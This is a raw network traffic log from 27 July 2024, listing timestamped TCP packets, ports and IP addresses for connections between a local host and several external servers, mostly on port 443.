Jul 27, 2024 07:30:49.090540886 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090555906 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090595961 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.090610981 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090621948 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090656042 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.090661049 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090684891 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090727091 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.090727091 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.090734959 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090759039 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090773106 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.090778112 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090820074 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090862036 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.090862036 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.090869904 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090887070 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.090918064 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.091603041 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.091641903 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.091669083 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.091676950 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.091722012 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.091722012 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.094459057 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.094527960 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.094568014 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.094573021 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.094611883 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.094611883 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.096983910 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.097048998 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.097050905 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.097064972 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.097101927 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.097112894 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.101632118 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.101742029 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.101759911 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.101850986 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.104969025 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.105031967 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.105120897 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.105258942 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.109886885 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.110064030 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.110105991 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.110105991 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.110116959 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.111206055 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.117219925 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.117491961 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.117495060 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.117505074 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.117568970 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.117568970 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.117770910 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.117822886 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.117940903 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.118119955 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.156879902 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.156951904 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.157252073 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.157316923 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.157335043 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.157392979 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.157439947 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.157439947 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.157449007 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.157609940 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.204505920 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.204577923 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.204648972 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.204720020 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.205415964 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.205629110 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.205688000 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.205809116 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.205821991 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.392035007 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.620500088 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.704541922 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:49.940537930 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:49.941190958 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.088937044 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.088953018 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.088965893 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089010954 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089026928 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089030027 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089052916 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089068890 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089080095 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089080095 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089082003 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089102030 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089119911 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089133978 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089137077 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089137077 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089137077 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089137077 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089155912 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089165926 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089181900 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089193106 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089200020 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089212894 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089221001 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089234114 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089247942 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089247942 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089247942 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089268923 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089279890 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089293003 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089302063 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089310884 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089324951 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089324951 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089325905 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089333057 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089350939 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089354038 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089374065 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089404106 CEST	443	51850	31.14.70.245	192.168.2.5
Jul 27, 2024 07:30:50.089420080 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089447021 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.089488983 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:50.331368923 CEST	443	51851	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:50.331459999 CEST	443	51851	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:50.331574917 CEST	51851	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:50.346168995 CEST	51851	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:50.346194983 CEST	443	51851	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:50.346240997 CEST	51851	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:50.346249104 CEST	443	51851	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:50.455050945 CEST	51853	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:50.455091953 CEST	443	51853	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:50.455157995 CEST	51853	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:50.455571890 CEST	51853	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:50.455588102 CEST	443	51853	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:51.165291071 CEST	443	51853	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:51.165384054 CEST	51853	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:51.168431997 CEST	51853	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:51.168440104 CEST	443	51853	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:51.168504953 CEST	51853	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:51.168509960 CEST	443	51853	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:51.168550014 CEST	51853	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:51.168554068 CEST	443	51853	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:51.168792009 CEST	443	51853	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:51.169558048 CEST	51853	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:51.169570923 CEST	443	51853	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:52.084453106 CEST	443	51853	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:52.084577084 CEST	443	51853	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:52.084654093 CEST	51853	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:52.100342035 CEST	51853	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:52.100342989 CEST	51853	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:52.100364923 CEST	443	51853	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:52.100377083 CEST	443	51853	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:52.205121994 CEST	51854	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:52.205161095 CEST	443	51854	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:52.205945969 CEST	51854	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:52.206410885 CEST	51854	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:52.206423044 CEST	443	51854	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:52.806994915 CEST	443	51854	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:52.807204008 CEST	51854	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:52.809792042 CEST	51854	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:52.809798002 CEST	443	51854	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:52.813924074 CEST	51854	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:52.813935041 CEST	443	51854	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:52.814059019 CEST	443	51854	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:52.814301968 CEST	51854	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:52.814311981 CEST	443	51854	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:54.903717995 CEST	443	51854	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:54.903788090 CEST	443	51854	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:54.903836012 CEST	51854	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:54.919526100 CEST	51854	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:54.919537067 CEST	443	51854	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:55.033235073 CEST	51855	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:55.033276081 CEST	443	51855	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:55.033351898 CEST	51855	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:55.033726931 CEST	51855	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:55.033740044 CEST	443	51855	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:55.651108027 CEST	443	51855	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:55.651197910 CEST	51855	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:55.654563904 CEST	51855	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:55.654567957 CEST	443	51855	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:55.654616117 CEST	51855	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:55.654618979 CEST	443	51855	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:55.654659033 CEST	51855	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:55.654661894 CEST	443	51855	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:55.654791117 CEST	443	51855	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:55.654941082 CEST	51855	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:55.654952049 CEST	443	51855	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:56.950072050 CEST	443	51855	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:56.950143099 CEST	443	51855	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:56.950196981 CEST	51855	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:56.965909004 CEST	51855	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:56.965909004 CEST	51855	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:56.965922117 CEST	443	51855	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:56.965929985 CEST	443	51855	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:57.080101013 CEST	51856	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:57.080194950 CEST	443	51856	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:57.080311060 CEST	51856	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:57.080699921 CEST	51856	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:57.080741882 CEST	443	51856	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:57.750305891 CEST	443	51856	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:57.750395060 CEST	51856	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:57.763897896 CEST	51856	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:57.763947010 CEST	443	51856	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:57.764013052 CEST	51856	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:57.764025927 CEST	443	51856	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:57.764168978 CEST	443	51856	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:57.764652967 CEST	51856	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:57.812534094 CEST	443	51856	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:58.781766891 CEST	443	51856	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:58.781836987 CEST	443	51856	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:58.782172918 CEST	51856	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:58.871948004 CEST	51856	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:58.871948004 CEST	51856	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:58.872033119 CEST	443	51856	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:58.872070074 CEST	443	51856	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:58.986541986 CEST	51857	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:58.986587048 CEST	443	51857	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:58.986787081 CEST	51857	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:58.988743067 CEST	51857	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:58.988760948 CEST	443	51857	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:59.201879025 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:59.371256113 CEST	51850	443	192.168.2.5	31.14.70.245
Jul 27, 2024 07:30:59.581864119 CEST	443	51857	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:59.581949949 CEST	51857	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:59.585880995 CEST	51857	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:59.585890055 CEST	443	51857	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:59.586776018 CEST	51857	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:59.586781979 CEST	443	51857	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:59.586846113 CEST	443	51857	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:59.587033033 CEST	51857	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:59.587049007 CEST	443	51857	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:59.615772963 CEST	80	51838	109.172.114.212	192.168.2.5
Jul 27, 2024 07:30:59.615854979 CEST	51838	80	192.168.2.5	109.172.114.212
Jul 27, 2024 07:30:59.615951061 CEST	51838	80	192.168.2.5	109.172.114.212
Jul 27, 2024 07:30:59.620737076 CEST	80	51838	109.172.114.212	192.168.2.5
Jul 27, 2024 07:30:59.620785952 CEST	51858	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:59.625713110 CEST	80	51858	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:59.625793934 CEST	51858	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:59.625926018 CEST	51858	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:59.625926018 CEST	51858	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:59.630705118 CEST	80	51858	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:59.630722046 CEST	80	51858	125.7.253.10	192.168.2.5
Jul 27, 2024 07:31:00.853599072 CEST	443	51857	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:00.853663921 CEST	443	51857	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:00.853714943 CEST	51857	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:00.883905888 CEST	51857	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:00.883905888 CEST	51857	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:00.883925915 CEST	443	51857	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:00.883938074 CEST	443	51857	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:00.986562014 CEST	51859	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:00.986607075 CEST	443	51859	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:00.986677885 CEST	51859	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:00.987087011 CEST	51859	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:00.987102985 CEST	443	51859	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:01.177618027 CEST	80	51858	125.7.253.10	192.168.2.5
Jul 27, 2024 07:31:01.177637100 CEST	80	51858	125.7.253.10	192.168.2.5
Jul 27, 2024 07:31:01.177740097 CEST	51858	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:31:01.221112967 CEST	51858	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:31:01.226042986 CEST	80	51858	125.7.253.10	192.168.2.5
Jul 27, 2024 07:31:01.605988026 CEST	443	51859	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:01.606102943 CEST	51859	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:01.609137058 CEST	51859	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:01.609143019 CEST	443	51859	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:01.609196901 CEST	51859	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:01.609201908 CEST	443	51859	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:01.609464884 CEST	443	51859	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:01.609606028 CEST	51859	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:01.609621048 CEST	443	51859	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:02.925797939 CEST	443	51859	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:02.926011086 CEST	443	51859	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:02.929943085 CEST	51859	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:02.945739031 CEST	51859	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:02.945739031 CEST	51859	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:02.945755959 CEST	443	51859	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:02.945763111 CEST	443	51859	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:03.048851013 CEST	51860	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:03.048943996 CEST	443	51860	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:03.049041033 CEST	51860	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:03.049484968 CEST	51860	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:03.049510956 CEST	443	51860	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:03.709270000 CEST	443	51860	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:03.709367037 CEST	51860	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:03.711968899 CEST	51860	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:03.711990118 CEST	443	51860	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:03.712054014 CEST	51860	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:03.712064981 CEST	443	51860	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:03.712331057 CEST	443	51860	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:03.712465048 CEST	51860	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:03.752535105 CEST	443	51860	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:04.708417892 CEST	443	51860	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:04.708527088 CEST	443	51860	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:04.708612919 CEST	51860	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:04.722017050 CEST	51860	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:04.722057104 CEST	443	51860	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:04.722084999 CEST	51860	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:31:04.722101927 CEST	443	51860	167.235.128.153	192.168.2.5
Jul 27, 2024 07:31:04.829991102 CEST	51861	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:04.830079079 CEST	443	51861	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:04.830172062 CEST	51861	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:04.830516100 CEST	51861	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:04.830535889 CEST	443	51861	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:05.424698114 CEST	443	51861	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:05.424865007 CEST	51861	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:05.427200079 CEST	51861	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:05.427217007 CEST	443	51861	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:05.427264929 CEST	51861	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:05.427270889 CEST	443	51861	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:05.427349091 CEST	51861	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:05.427355051 CEST	443	51861	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:05.427884102 CEST	443	51861	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:05.428055048 CEST	51861	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:05.468528986 CEST	443	51861	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:06.769315004 CEST	443	51861	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:06.769548893 CEST	443	51861	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:06.769630909 CEST	51861	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:06.785810947 CEST	51861	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:06.785865068 CEST	443	51861	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:06.785901070 CEST	51861	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:31:06.785917997 CEST	443	51861	107.173.160.137	192.168.2.5
Jul 27, 2024 07:31:06.892577887 CEST	51862	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:06.892616987 CEST	443	51862	107.173.160.139	192.168.2.5
Jul 27, 2024 07:31:06.892724037 CEST	51862	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:06.893306971 CEST	51862	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:31:06.893321037 CEST	443	51862	107.173.160.139	192.168.2.5
